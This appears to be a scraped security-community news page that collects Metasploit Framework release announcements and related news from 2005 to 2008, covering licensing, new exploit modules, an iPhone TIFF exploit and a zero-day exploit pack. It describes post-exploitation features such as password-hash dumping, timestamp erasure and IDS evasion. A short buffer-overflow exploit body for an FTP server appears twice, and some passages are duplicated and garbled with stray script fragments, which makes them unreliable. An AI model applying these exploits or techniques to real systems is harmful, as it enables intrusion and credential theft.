Who's Online
There are currently, 28 guest(s) and 1 member(s) that are online.
You are Anonymous user. You can register for free by clicking here
|  |
Metasploit Hacking Tool Now Open for Licensing
Posted by cdupuis on Thursday, 16 October 2008 @ 19:59:51 EDT (739 reads)
Topic Metasploit
Lou writes "As reported by
Kelly Jackson Higgins
Senior Editor, Dark Reading
Metasploit Hacking Tool Now Open for Licensing
The wildly popular Metasploit hacking tool for the first time is now officially open source, open-license technology that can be incorporated into commercial tools.
The free research and penetration testing tool historically has had restricted, non-commercial licensing so that it could only be used by researchers or in-house penetration testers -- not repackaged, redistributed, or sold. But in the new version 3.2 -- due later this month in its final version -- Metasploit project lead HD Moore and his team have transformed Metasploit into an official open source project, complete with a BSD 3-Clause license arrangement that allows others to sell, rename, or “fork” the code in another direction.
"Changing the license to be as open as possible -- BSD 3-clause is nearly public domain -- would not only be fair to the new developers, but allow us to expand beyond the original goal as an exploit platform and become the basis for wide variety of new projects," says Moore. "It's entirely likely that we will see new projects targeted at individual sectors and applications, which we hope will filter some improvements back to the core project. By opening the license to the entire Metasploit codebase, we have let the proverbial cats out of the bag -- it's now just a matter of counting kittens."
For the full article:
http://www.darkreading.com/document.asp?doc_id=165636&WT.svl=news1_6
"
Metasploit 3.1 has been released
Posted by boss on Tuesday, 29 January 2008 @ 14:35:49 EST (676 reads)
Topic Metasploit
cdupuis writes " METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn
Austin, Texas, January 28th, 2008
-- The Metasploit Project announced today the free, world-wide availability of version 3.1 of their exploit development and attack framework.
The latest version features a graphical user interface, full support for the Windows platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development, integrating ideas and code from some of the sharpest and most innovative folks in the security research community" said H D Moore, project manager. Moore is referring the numerous research projects that have lent code to the framework.
These projects include:
- The METASM pure-ruby assembler developed by Yoann Guillot and Julien Tinnes,
- The "Hacking the iPhone" effort outlined in the Metasploit Blog,
- the Windows kernel-land payload staging system developed by Matt Miller,
- the heapLib browser exploitation library written by Alexander Sotirov,
- the Lorcon 802.11 raw transmit library created by Joshua Wright and Mike Kershaw,
- Scruby, the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain Sarmejeanne,
- and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by encoding a payload with a target-specific key" said I)ruid, author of the Uninformed Journal (volume 9) article and developer of the contextual encoding system included with Metasploit 3.1.
The graphical user interface is a major step forward for Metasploit users on the Windows platform. Development of this interface was driven by Fabrice Mourron and provides a wizard-based exploitation system, a graphical file and process browser for the Meterpreter payloads, and a multi-tab console interface.
"The Metasploit GUI puts Windows users on the same footing as those running Unix by giving them access to a console interface to the framework" said H D Moore, who worked with Fabrice on the GUI project.
The latest incarnation of the framework includes a bristling arsenal of exploit modules that are sure to put a smile on the face of every information warrior.
Notable exploits in the 3.1 release include a remote, unpatched kernel-land exploit for Novell Netware, written by toto, a series of 802.11 fuzzing modules that can spray the local airspace with malformed frames, taking out a wide swath of wireless-enabled devices, and a battery of exploits targeted at Borland's InterBase product line. "I found so many holes that I just gave up releasing all of them", said Ramon de Carvalho, founder of RISE Security, and Metasploit contributor.
"Metasploit continues to be an indispensable and reliable penetration testing framework for our modern era", says C. Wilson, a security engineer who uses Metasploit in his daily work. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.
The framework is written in the Ruby programming language and includes components written in C and assembler. Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the tiny Nokia n800 handheld.
Users can access Metasploit using the tab-completing console interface, the Gtk GUI, the command line scripting interface, or the AJAX-enabled web interface.
The Windows version of Metasploit includes all software dependencies and a selection of useful networking tools.
The latest version of the Metasploit Framework, as well as screen shots, video demonstrations, documentation and installation instructions for many platforms, can be found online at: http://metasploit3.com/ "
Use Metasploit to hack an IPhone
Posted by boss on Wednesday, 17 October 2007 @ 10:23:55 EDT (549 reads)
Topic Metasploit
cdupuis writes "As seen at: COMPUTERWORLD
October 16, 2007
(Computerworld)
Noted hacker HD Moore has publicly posted exploits that take advantage of a vulnerability in Apple's iPhone, the same flaw that's been used by others to unlock the smart phone so it will work on non-AT&T networks.
The vulnerability, which is in the TIFF image-rendering library shared by the iPhone's Safari browser and its e-mail program, as well as by the iTunes software, leaves the iPhone wide open to attack, said Moore, who posted a second, and more robust, exploit today after debuting attack code yesterday.
"This exploit is rock solid," Moore said in an interview. "It's very reliable, as reliable as the WMF [Windows Metafile] exploits in Windows. You can send it in an e-mail, you can embed it in a Web page."
Although the vulnerability is the same as the one leveraged by hackers such as the iPhone Dev Team to return unlock capabilities to iPhones updated to Firmware 1.1.1 last month, Moore said that's the only similarity between his work and the activities of unlockers. "I wanted an exploit that would write any arbitrary payload" to the iPhone, rather than the specialized changes made for an unlocking hack, Moore said. He claimed success.
"The second exploit works on 1.0, 1.0.1, 1.0.2 and 1.1.1 iPhones," he said, referring to the four versions of the phone's firmware released since the device's June debut. Although he expects Apple to plug the TIFF vulnerability in the next iPhone update -- a move that many interested in unlocking the iPhone have also predicted and bemoaned -- Moore also said it wouldn't matter. Citing the history of the vulnerability, which was also present in the Sony PlayStation Portable (PSP), he said attackers will be able to exploit the flaw in the future, even if Apple fixes it. "All they'll need to do is back port the firmware to an earlier version that's vulnerable," said Moore.
"Apple has to leave a way to restore an iPhone back [to previous versions of the firmware]." The same technique was used to hack the Sony PSP after Sony issued an update that patched the TIFF vulnerability on that video game player.
In notes posted to customers of its DeepSight threat management network, Symantec Corp. warned iPhone users of Moore's exploits and recommended they use caution when browsing the Web, handling unsolicited e-mail and dealing with suspicious or unexpected music files.
But Ollie Whitehouse, a software architect with Symantec's security response team, downplayed the iPhone's apparent insecurity. "The iPhone isn't any different from other mobile platforms," he argued. "It's only the interest from the security research community that makes it seem different."
Moore disagreed. "I think the iPhone is pretty terrible," he said, referring to its level of security. "It's an easy platform to exploit." That's true in part, he explained, because exploiting any iPhone application gives root access to the entire phone. But other security weaknesses abound, including ones in the Safari browser and in the underlying operating system -- a scaled-back version of Mac OS X -- that runs the device, he added.
Moore has added the exploits to Metasploit, the popular penetration framework, a move that in the past has meant in-the-wild attacks are not far behind.
He predicted that malicious code exploiting the TIFF vulnerability would be on the loose "pretty soon." "
HD Moore & Valsmith Tactical Exploitation Paper from Black Hat and Defcon
Posted by boss on Friday, 10 August 2007 @ 12:52:34 EDT (789 reads)
Topic Metasploit
Anonymous writes "At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk entitled "Tactical Exploitation".
This talk introduced a tactical approach to penetration testing that does not rely on exploiting known vulnerabilities.
During the talk, we used a combination of new tools and lesser-known techniques to walk through the process of compromising a target network.
The materials for this talk are now online, including the slides, white paper, and videos. These materials can be found online at:
- http://metasploit.com/confs/
For those who missed both the talks or couldn't stay for all of one, the white paper does a good job of covering the things we discussed:
- http://metasploit.com/confs/blackhat2007/tactical_paper.pdf
Most of the exploits and tools can be found in the trunk version of the Metasploit Framework. These will be merged into the stable tree over the next week or so (along with some HOWTOs on the Metasploit Blog).
To grab the latest version of the Metasploit Framework, you can use the following command:
$ svn co http://metasploit.com/svn/framework3/trunk/ msf3-trunk
$ ./msf3-trunk/msfconsole
Thanks to everyone who came to our talks!
-HD"
Metasploit Framework 3.0 has been released
Posted by boss on Tuesday, 27 March 2007 @ 10:02:23 EDT (1649 reads)
Topic Metasploit
Anonymous writes "March 27th, 2007 -- Metasploit is pleased to announce the immediate, free availability of the Metasploit Framework version 3.0 from http://framework.metasploit.com/ .
The Metasploit Framework ("Metasploit") is a development platform for creating security tools and exploits. Version 3.0 contains 177 exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally, 30 auxiliary modules are included that perform a wide range of tasks, including host discovery, protocol fuzzing, and denial of service testing.
Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the tiny Nokia n800 handheld. Users can access Metasploit using the tab-completing console interface, the command line scripting interface, or the AJAX-enabled web interface. The Windows version of Metasploit includes all software dependencies and a selection of useful networking tools.
The latest version of the Metasploit Framework, as well as screen shots, video demonstrations, documentation and installation instructions for many platforms, can be found online at http://framework.metasploit.com/
Metasploit 3 is a from-scratch rewrite of Metasploit 2 using the Ruby scripting language. The development process took nearly two years to complete and resulted in over 100,000 lines of Ruby code. As such, there are some notable differences between version 2.7 and 3.0:
* The Fs, Sys, Net, and Process extensions in the Metasploit 2.7 Meterpreter have been combined into a single extension that is automatically loaded in Metasploit 3. The "stdapi" extension can be used to manipulate files, list and manage processes, migrate the payload into a new process, edit a file on the server, forward a port, execute a command, and many other tasks. The "priv" extension (accessible by the "use priv" command) provides the hashdump command for dumping password hashes and the timestomp command for erasing file system timestamps.
* The Meterpreter shell provides an "irb" command thats allows interactive scripting of a compromised system. One of the features of the Metasploit client API is the the ability to read and write the memory of any accessible process on the exploited system, all from inside a Ruby shell. When combined with a Meterpreter script (started with the "run" command from inside Meterpreter), this feature can be used to backdoor running applications or steal in-memory credentials.
* The Metasploit console provides an "irb" command (on Unix systems
only) thats allows direct access to the Ruby internals at runtime.
This can be used to modify the behavior of the framework, interact with existing connections, and as a development environment for plugins.
* The Metasploit console interface has a new "route" command that allows all network connections to a given subnet to be routed through an existing session. This can be used in conjunction with the Meterpreter payload to relay attacks through exploited systems.
* Database support is provided via a set of plugins and a standard command interface. The database can be used to track host information during a penetration test and launch automated attacks against a network (db_autopwn). The current release can import both Nessus NBE files and Nmap XML output files. Data provided by these tools can be used to cross-reference open ports and vulnerabilities with Metasploit modules.
* User options have been separated into three types: standard, advanced, and evasion. Evasion options allow the user to bypass IDS and IPS systems by specifying how exploit data is generated and delivered. Evasion options are available for most exploits, with particular attention paid to the SMB, DCERPC, and HTTP protocols.
* A plugin system allows developers to add their own commands to the console interface, hook framework events, and extend the framework at runtime without having to modify the base code. Examples plugins have been included in the "plugins" subdirectory of the framework. Example plugins include an "auto-tagger", a socket filter, a telnet service, and a number of database and debugging plugins.
* An event subscription system allows modules and plugins to wait for specific events and automatically perform different actions. This feature can be used to hook socket operations, filter data flows, and automated post-exploitation tasks.
* Metasploit modules can import methods and behaviors from a huge library of Ruby Mixins. This release includes support for protocols such as SMB, DCERPC, FTP, IMAP, NDMP, SMTP, and SUNRPC. Mixins are also provided for developing brute force exploits, creating egghunters, injecting user-land payloads from the Windows kernel, exploiting SEH overwrites, sniffing network traffic, and injecting raw WiFi frames.
* Metasploit modules are now organized in a directory structure instead of a single flat directory. A caching system provides faster loading times. The result is a scalable system that can manage hundreds of different modules at a time (over 300 alone in this release).
* The web interface (msfweb) is a Ruby on Rails application that uses the Prototype JavaScript Framework to provide in-browser windowing support. Asynchronous JavaScript is used to provide as-you-type search results for any module type and provide tab completion for the web console interface.
* Thanks to Ruby's in-process threading support, it is possible to share a single Metasploit instance with other users, exploit multiple hosts at the same time, and run persistent background services, while only consuming the system resources of a single process. The msfd plugin adds a telnet interface to an existing Metasploit instance.
* The new Auxiliary module type allows the development of almost any form of security or attack tool. Auxiliary modules have complete access to the Metasploit attack and protocol libraries and can be used to quickly develop research tools and proof-of-concepts.
* Subversion is now used for online updates and version control. This allows users to easily switch between the development and stable version of the framework and obtain online updates using any transport supported by Subversion.
* This release includes three exploit modules that exploit WiFi driver vulnerabilities in the Windows kernel. Combined with the kernel user-land payload stager, this allows any Metasploit payload to be used with ring-0 exploits on the Windows platform. A handful of auxiliary modules are included that trigger denial of service conditions in WiFi drivers across a variety of platforms.
* Metasploit is now released under the Metasploit Framework License.
This license allows anyone to use the framework for almost anything, but prevents commercial abuse and outright code theft. The Metasploit Framework License helps keep the platform stable and still allows module developers to choose their own licensing terms for their code (commercial or open source). For more information, please see the license document included in the distribution.
* The Rex library, which provides most of the utility methods and protocol support for the framework, has been released under the 3-clause BSD license. Ruby developers can use this code to build open source or commercial applications that are not subject to the restrictions of the Metasploit Framework License.
Enjoy!
- The Metasploit Staff
"
VulnDisco Pack for Metasploit with zero day exploits
Posted by boss on Monday, 06 November 2006 @ 21:43:09 EST (594 reads)
Topic Metasploit
cdupuis writes "NOTE FROM CLEMENT:
As of Nov 15, 2006, this package is no longer available from Gleg, it seem they were pressured into dropping their support and free give away to the Metasploit framework. The following is now posted on their site:
Due to security reasons, we currently stopped to provide this product both free and commercial versions. All information intended for this product is moved to VulnDisco Pack Professional, which is available for valid Immunity CANVAS users.
Hi All,
I am glad to announce that free version of VulnDisco Pack for Metasploit Framework 2.7 is available for download.
This release includes the following 0day exploits:
vd_ldapinfo.pm - [0day] Query info from LDAP server
vd_xlink.pm - [0day] Omni-NFS Enterprise remote exploit
vd_openldap.pm - [0day] OpenLDAP DoS
You can download it here: http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz
For more info about VulnDisco Pack for Metasploit please visit:
http://gleg.net/vulndisco_meta.shtml
--
Best regards,
Evgeny Legerov
Click on Read More... below to learn more about VulnDisco and the products offered by GLEG.
"
Metasploit Version 3 Beta 3 is out
Posted by boss on Monday, 30 October 2006 @ 16:03:01 EST (389 reads)
Topic Metasploit
cdupuis writes "The Metasploit Framework is an advanced open-source exploit development platform.
The 3.0 tree represents a complete rewrite of the 2.0 codebase and provides a scalable and extensible framework for security tool development.
The 3.0 Beta 3 release includes support for:
exploit automation[1],
802.11 wireless packet injection[2],
and kernel-mode payloads[3].
Windows users are now presented with a RXVT console and an updated Cygwin environment, which greatly improves the usability of the 3.0 interface on the Windows platform.
The Metasploit Web Interface is still in development, but this release includes a preview of what the end functionality will look like. The web interface provides a "webtop" interface for interacting with the framework and uses aynschronous javascript to provide live searching. A early version of Metasploit IDE is also included with the web interface.
Downloads for all platforms can be found here:
- http://metasploit.com/projects/Framework/msf3/#download
The latest version can be pulled directly from Subversion:
$ svn co https://metasploit.com/svn/framework3/trunk/
Unix users may need to install the openssl zlib and dl ruby modules for the Framework to load. If you are using Ubuntu you will need to run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
Unix users who wish to try the new web interface will need to install the 'rubygems' package and the 'rails' gem. Please see www.rubyonrails.com for more information and platform-specific installation instructions.
Users of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source. We highly recommend using Ruby version 1.8.4 or newer.Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. The old 3.0 installation should be uninstalled prior to installing and using this version.
The release packages include Subversion repository information allowing you to synchronize your Beta 3 installation with the live development tree. The Windows installer includes a "MSFUpdate" menu item that uses Subversion to download the latest updates.Unix users will need to install the Subversion client change into the framework directory and execute 'svn update'.
On Unix systems, Subversion will complain about the self-signed certificate in use at metasploit.com. Please verify that the fingerprint matches the one below before accepting it:
===
- Hostname: metasploit.com
- Valid: from Jun 3 06:56:22 2005 GMT until Mar 31 06:56:22 2007 GMT
- Issuer: Development The Metasploit Project San Antonio Texas US
- Fingerprint: 1f:a2:8e:ad:14:57:53:75:b7:ab:de:67:e8:fa:17:49:76:f2:ee:ad
===
Enjoy!
- The Metasploit Staff
1. http://tinyurl.com/yadb4p
2. http://www.eweek.com/article2/0,1895,2040914,00.asp
3. http://tinyurl.com/yx5q79
"
Metasploit Version 2.7 has been released
Posted by boss on Monday, 30 October 2006 @ 15:57:46 EST (342 reads)
Topic Metasploit
cdupuis writes "The Metasploit Framework is an advanced open-source exploit development platform. The 2.7 release includes three user interfaces, 157 exploits and 76 payloads.The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Windows users are encouraged to update as soon as possible. A number of improvements were made that should make the Windows experience a little less painful and a lot more reliable. All updates to 2.6 have been rolled into 2.7, along with some new exploits and minor features.
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.7.tar.gz
- Win32: http://metasploit.com/tools/framework-2.7.exe
The latest version can be pulled directly from Subversion:
$ svn co http://metasploit.com/svn/framework2/trunk/
A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/
This may be the LAST 2.x version of the Metasploit Framework. All development resources are now being applied to version 3.0. More information about version 3.0 can be found online at:
- http://metasploit.com/projects/Framework/msf3/
Exploit modules designed for the 2.2 through 2.6 releases should maintain compatibility with 2.7. If you run into any problems using older modules with this release, please let us know.
Donations to the Metasploit Project are now tax deductible for US entities. Please see the donations web page for more information.
- http://metasploit.com/donate.html
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide:
- http://metasploit.com/projects/Framework/documentation.html
We would like to thank the community in general and the Metasploit contributors in particular for their support of the project.
Changes since the 2.6 release:
windows:
* The Windows installer and Cygwin environment have been updated
* The console size has been greatly improved under Windows
* Large payloads (meterpreter/vncinject) are much more reliable
msfupdate:
* The msfupdate tool has been replaced with Subversion
* All Subversion features (branching, diffs, etc) are supported
meterpreter:
* The SAM extension now works against NX/DEP systems.
exploits:
* Minor cosmetic improvements to many modules
* 14 new exploits added since 2.6 was released
payloads:
* The payload staging system is more reliable for large payloads
* Size reductions and reliability improvements
Enjoy!
- The Metasploit Staff
"
Metasploit 3.0-Beta-1 Has been released
Posted by boss on Monday, 07 August 2006 @ 23:41:25 EDT (475 reads)
Topic Metasploit
Anonymous writes "Metasploit 3.0 is the next generation of the Metasploit Framework. It is written in the Ruby programming language and is a complete rewrite of the 2.0 branch. The Metasploit 2.0 branch drastically reduced exploit development time and promoted code re-use between similar exploit modules. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research.
In this light, the 3.0 branch continues to evolve the field of exploitation research and exploitation frameworks in general. The primary goals of the 3.0 branch are listed below:
- Improve automation of exploitation through scripting
- Simplify the process of writing an exploit
- Increase code re-use between exploits
- Improve and generically integrate evasion techniques
- Support automated network discovery and event correlation through recon modules
- Continue to provide a friendly outlet for cutting edge exploitation technology
"
Metasploit Version 2.6 has been released
Posted by boss on Wednesday, 24 May 2006 @ 08:35:40 EDT (1294 reads)
Topic Metasploit
cdupuis writes "Metasploit Framework ChangeLog
==============================
05/23/2005
Version 2.6 is released
Recent changes:
05/22/2006
New exploit module added: freeftpd_key_exchange
New exploit module added: edirectory_imonitor2
New exploit module added: tftpd32_long_filename
Bug fixes to realvnc_41_bypass
Bug fixes to ie_iscomponentinstalled
New authors added to Credits
Get it from: http://metasploit.com/projects/Framework/downloads.html
See running demo at: http://metasploit.com:55555/
"
Metasploit Framework version 3.0 Alpha Release 1
Posted by boss on Thursday, 15 December 2005 @ 09:25:28 EST (641 reads)
Topic Metasploit
Anonymous writes "The Metasploit staff is proud to present the first alpha release of the 3.0 branch of the Metasploit Framework. This release marks a major milestone in the evolution of the Metasploit Framework and is based on a
complete rewrite of the 2.x series.
products. Unlike the 2.0 series, the 3.0 branch is written in Ruby, an
object-oriented, interpreted scripting language, that has drastically
simplified the implementation of the framework.
This release includes 44 exploits, 76 payloads, 7 encoders, 2 nops, and 2
recon modules. The supported platforms are Linux , Mac OS X, and most
BSDs. The framework requires version 1.8.1 or newer of the Ruby
interpreter. Windows is not supported at this time, either through Cygwin
or the native build. Mac OS X users will need to install Ruby from source
(or an OSS package manager) due to a build error in the version of Ruby
supplied with Mac OS 10.4.
The latest 3.0 code, developer documentation, and general information can
be found online at the following location:
- http://metasploit.com/projects/Framework/msf3/
This is an *alpha release*, expect things to break, crash, and generally
not work very well. This version is being released to gather feedback
from the community and to weed out the major bugs before entering the
true beta period. There are many features that have not been completely
implemented at this point and there are still some edges that will need
to be smoothed out prior to the final release. A few major features are
not implemented, including msfweb's exploit mode, some levels of session
interaction, and the more user-friendly scripting APIs.
Bugs can be submitted to msfdev[at]metasploit.com, or by subscribing to
the framework-beta mailing list. To subscribe, send a blank email to
framework-beta-subscribe[at]metasploit.com.
To demonstrate how the 3.0 branch has simplified exploit development,
check out the following code sample, which provides the exploit body for
",1]
);
//-->The 3.0 branch is designed to provide automation capabilities at every stage of the discovery and exploitation process. Nearly every component of the framework can be extended, hooked, and automated, allowing for streamlined penetration testing and tight integration with third-party products. Unlike the 2.0 series, the 3.0 branch is written in Ruby, an object-oriented, interpreted scripting language, that has drastically simplified the implementation of the framework.
This release includes 44 exploits, 76 payloads, 7 encoders, 2 nops, and 2 recon modules. The supported platforms are Linux , Mac OS X, and most BSDs. The framework requires version 1.8.1 or newer of the Ruby
interpreter. Windows is not supported at this time, either through Cygwin or the native build. Mac OS X users will need to install Ruby from source (or an OSS package manager) due to a build error in the version of Ruby supplied with Mac OS 10.4.
The latest 3.0 code, developer documentation, and general information can be found online at the following location: - http://metasploit.com/projects/Framework/msf3/
This is an *alpha release*, expect things to break, crash, and generally not work very well. This version is being released to gather feedback from the community and to weed out the major bugs before entering the
true beta period. There are many features that have not been completely implemented at this point and there are still some edges that will need to be smoothed out prior to the final release. A few major features are not implemented, including msfweb's exploit mode, some levels of session interaction, and the more user-friendly scripting APIs.
Bugs can be submitted to msfdev[at]metasploit.com, or by subscribing to the framework-beta mailing list. To subscribe, send a blank email to framework-beta-subscribe[at]metasploit.com.
--- connect print_status("Trying target #{ target.name}...") buf u003d Rex::Text.rand_text_english(2048, payload_badchars) seh u003d generate_seh_payload(target.ret) buf[229, seh.length] u003d seh send_cmd( ['USER', buf] , false ) disconnect handler --- This release includes many new features that are not present in the 2.x series. The highlights are presented below: [ The Metasploit Console Interface ] The msfconsole interface in version 3.0 is similar to the 2.x series, however the available command set and interaction options have been dramatically extended. * Backgrounded exploits -- It's now possible to execute an exploit in the background. This means you can have an exploit that triggers a passive vulnerability (such as a browser bug, a sniffer exploit, etc) while performing other tasks. Each successful exploit attempt will show up in the list of active sessions, any of which can be accessed at any time. * Multi-session exploits -- Unlike the 2.x series, the 3.0 branch is capable of creating multiple sessions from a single exploit. This is especially useful in the context of passive exploits that can have multiple clients connecting. * Multiple concurrent sessions -- It is possible to have more than one active session established. An active session can sent to the background through the ^Z sequence. * IRB mode -- The console interface supports dropping into a Ruby scripting interface that allows direct interactation with the framework instance. This makes it possible to do low-level interaction with sessions and framework modules. [ The Meterpreter Payload ] The Meterpreter payload has been extended and refined for the 3.0 branch. The underlying architecture and design remains the same, but the feature ",1]
);
//-->To demonstrate how the 3.0 branch has simplified exploit development, check out the following code sample, which provides the exploit body for the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb): --- connect print_status("Trying target #{ target.name}...") buf = Rex::Text.rand_text_english(2048, payload_badchars) seh = generate_seh_payload(target.ret) buf[229, seh.length] = seh send_cmd( ['USER', buf] , false ) disconnect handler --- Click on Read More... below for a detailed list of changes and features
Metasploit 2.5 is released
Posted by boss on Tuesday, 25 October 2005 @ 00:46:26 EDT (548 reads)
Topic Metasploit
Anonymous writes "The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
A demonstration of the msfweb interface is running live from: - http://metasploit.com:55555/ Information about version 3.0 has been posted online: - http://metasploit.com/projects/Framework/msf3/ Exploit modules designed for the 2.2 through 2.4 releases should maintain compatibility with 2.5. If you run into any problems using older modules with this release, please let us know.
The Framework development team consists of a few active members and over a dozen contributors. Check out the donations web page for a complete list of contributors: - http://metasploit.com/donate.html
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
Enjoy!
- The Metasploit Framework Development Team
"
Metasploit Web Interface Tutorial
Posted by boss on Sunday, 10 July 2005 @ 12:07:01 EDT (1880 reads)
Topic Metasploit
New version of Metasploit released
Posted by boss on Wednesday, 11 May 2005 @ 22:32:09 EDT (893 reads)
Topic Metasploit
The Metasploit Framework is an advanced open-source exploit development platform. The 2.4 release includes three user interfaces, 72 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Some highlights in this release:
- Previously unreleased exploits (20 others added since 2.3)
+ Solaris KCMS Arbitary File Read
+ Solaris snmpXdmid AddComponent Overflow
+ Metasploit Framework Payload Handler
+ Microsoft Message Queueing Service MSO5-017
+ Minishare 1.41 Buffer Overflow
- Addition of the new SunRPC and XDR Perl API
+ Allows for clean RPC exploit development
+ Used by two new exploit modules (KCMS and snmpXdmid)
+ Updated sadmind exploit uses the new API
- Includes the new win32 PassiveX payload system
+ Loads an arbitary ActiveX through Internet Explorer
+ PassiveX payload loads the next stage over HTTP
+ HTTP transport emulates a standard TCP connection
+ Interact with cmd.exe, VNC, or Meterpreter over HTTP
+ Uses Internet Explorer settings for proxy access
+ Fully-functional on systems with Internet Explorer 6
+ Extensive documentation is available online: http://www.uninformed.org/?v=1&a=3&t=pdf
- Stability improvements and numerous bugs fixes
+ The msfweb interface is slightly less of a memory pig
+ Many exploits have been updated and improved
+ New external references added to the exploit modules
- General improvements to the payload system
+ Brand new "shelldemo" binary for the impurity stager
+ Size reductions to win32_bind, win32_reverse, and others
+ Can now make standalone executables with msfpayload
+ Interact with metasploit payloads via payload_handler.pm
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.4.tar.gz
- Win32: http://metasploit.com/tools/framework-2.4.exe
A demonstration of the msfweb interface is running live from: http://metasploit.com:55555/
Exploit modules designed for the 2.2 and 2.3 releases should maintain compatibility with 2.4. If you run into any problems using older modules with this release, please let us know.
The Opcode Database now includes Service Pack 1 for Windows 2003 Server, increasing the record count to over 10 million. We would like to thank Catalin Patulea for helping us optimize and improve the database -- queries are now drastically faster.
The Framework development team consists of four active members and a handful of part-time contributors. Check out the 'Credits' exploit module for a complete list of contributors.
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide: http://metasploit.com/projects/Framework/documentation.html
Enjoy!
- The Metasploit Framework Development Team ( hdm, spoonm, skape, and vlad902 )
Metasploit Framework 2.3 released
Posted by boss on Wednesday, 12 January 2005 @ 11:30:52 EST (1397 reads)
Topic Metasploit
Anonymous writes "
The Metasploit Framework is an advanced open-source exploit development platform. The 2.3 release includes three user interfaces, 46 exploits and 68 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Some highlights in this release:
- Complete overhaul of the Framework payload collection
+ Win32 ordinal-stagers are now included (92-byte reverse connect)
+ A handful of new sparc payloads have been added (sol, linux, bsd)
+ Reliability problems have been resolved in bsd, linux, and win32
+ New udp-based linux shell stagers and shell payloads
+ New size-optimized Mac OS X encoders and payloads
- Includes the win32 version of the Meterpreter
+ Dynamically load new features over the network w/o disk access
+ In-memory dll injection of the basic meterpreter shell
+ Current extensions include Fs, Process, Net, and Sys
+ Extensive documentation is available online: http://metasploit.com/projects/Framework/docs/meterpreter.pdf
- Complete rewrite of the 'msfweb' user interface
+ Generate and encode stand-alone shellcode from the web interface
+ The interface is skinnable and includes three different themes
+ Streaming HTTP is used to provide a 100% web-based shell
+ Ability to set advanced options in the web interface
- Massive speed enhancements in msfconsole and msfweb
+ Snappier response and quicker load times on older systems
+ Optimizations made to various sort/search algorithms
+ Modules are no longer reloaded after each exploit
- New exploits
+ Microsoft WINS Service Memory Overwrite (MS04-045)
+ Samba trans2open() Buffer Overflow (Mac OS X)
+ 4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
+ Veritas Name Service Registration Buffer Overflow
+ AOL Instant Messenger 'goaway' Buffer Overflow
+ IPSwitch IMail IMAPD 'delete' Buffer Overflow
+ Seattle Labs Mail Server POP3 Buffer Overflow
+ UoW IMAPD Buffer Overflow (sparc, ia32)
+ IRIX lpdsched Remote Command Execution
+ CDE dtspcd Buffer Overflow (Solaris)
+ IIS 4.0 ism.dll HTR Buffer Overflow
+ IIS w3who.dll ISAPI Buffer Overflow
This release is available from the Metasploit.com web site:
Unix: http://metasploit.com/tools/framework-2.3.tar.gzWin32: http://metasploit.com/tools/framework-2.3.exeScreen shots of the new release are online and available from:
http://metasploit.com/projects/Framework/screenshots.html
A demonstration of the new msfweb interface is running live from:
http://metasploit.com:55555/
Exploit modules designed for the 2.2 release should maintain compatibility with 2.3. If you run into any problems using older modules with this release, please let us know.
The Framework development team consists of four active members and a handful of part-time contributors. Check out the 'Credits' exploit module for a complete list of contributors.
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
Starting with the 2.2 release, it is now possible to perform a system-wide installation of the Framework. Simply extract the tarball into the directory of your choice and create symbolic links from the msf* executables to a directory in the system path. Users may maintain their own exploit module collections by placing them into ~/.msf/exploits/. If you are interested in adding the Framework to a operating system distribution, please drop us a line and we will gladly help with the integration and testing process.
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide:
http://metasploit.com/projects/Framework/documentation.html
